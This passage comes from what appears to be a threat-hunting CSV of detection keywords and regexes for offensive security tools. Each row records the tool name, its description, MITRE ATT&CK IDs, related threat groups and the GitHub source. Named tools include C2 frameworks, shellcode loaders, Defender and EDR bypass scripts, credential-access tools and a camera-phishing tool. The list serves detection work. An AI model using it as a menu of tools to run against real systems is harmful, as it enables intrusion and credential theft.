This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*EncryptedZIP.exe*",".{0,1000}EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*encryptor -f *.exe -o *.enc*",".{0,1000}encryptor\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*EncryptShellcode(*",".{0,1000}EncryptShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}Endpoint\-EE15B860\-9EEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Enelg52/KittyStager*",".{0,1000}Enelg52\/KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Engineer_super.exe*",".{0,1000}Engineer_super\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*engjibo/NetUser*",".{0,1000}engjibo\/NetUser.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" 
"*enigma_fileless_uac_bypass*",".{0,1000}enigma_fileless_uac_bypass.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*enigma0x3*",".{0,1000}enigma0x3.{0,1000}","offensive_tool_keyword","Github Username","Github Author of malicious script and exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*enjoiz/Privesc*",".{0,1000}enjoiz\/Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*enkomio/AlanFramework*",".{0,1000}enkomio\/AlanFramework.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*enpass2john.py*",".{0,1000}enpass2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*enpass5tojohn.py*",".{0,1000}enpass5tojohn\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Enter the Direct Link of malware : *",".{0,1000}Enter\sthe\sDirect\sLink\sof\smalware\s\:\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Enter your loclx authtoken:*",".{0,1000}Enter\syour\sloclx\sauthtoken\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Enter-SMBSession -ComputerName *",".{0,1000}Enter\-SMBSession\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Enter-SMBSession* -PipeName * -ServiceName *",".{0,1000}Enter\-SMBSession.{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Enter-WmiShell 
*",".{0,1000}Enter\-WmiShell\s.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Enter-WmiShell.ps1*",".{0,1000}Enter\-WmiShell\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*--entrypoint Dinjector*",".{0,1000}\-\-entrypoint\sDinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*enum_ad_service_principal_names *",".{0,1000}enum_ad_service_principal_names\s.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*enum_artifacts_list.txt*",".{0,1000}enum_artifacts_list\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_av_excluded.rb*",".{0,1000}enum_av_excluded\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_avproducts.py*",".{0,1000}enum_avproducts\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*enum_brocade.md*",".{0,1000}enum_brocade\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_domain_info.py*",".{0,1000}enum_domain_info\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_enumdomusers(*",".{0,1000}enum_enumdomusers\(.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*enum_firefox.rb*",".{0,1000}enum_firefox\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_hostfile.md*",".{0,1000}enum_hostfile\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_logged_on_users*",".{0,1000}enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_logged_on_users.*",".{0,1000}enum_logged_on_users\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_mikrotik.md*",".{0,1000}enum_mikrotik\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_ms_product_keys.*",".{0,1000}enum_ms_product_keys\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_printers.py*",".{0,1000}enum_printers\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.py*",".{0,1000}enum_shares\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.rb*",".{0,1000}enum_shares\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_vmware.rb*",".{0,1000}enum_vmware\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_vyos.md*",".{0,1000}enum_vyos\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum4linux*",".{0,1000}enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","1038","231","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z" "*enum4linux_*.txt*",".{0,1000}enum4linux_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*enum4linux-ng -A -u *",".{0,1000}enum4linux\-ng\s\-A\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EnumCLR.exe*",".{0,1000}EnumCLR\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR 
loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Enum-Creds*",".{0,1000}Enum\-Creds.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
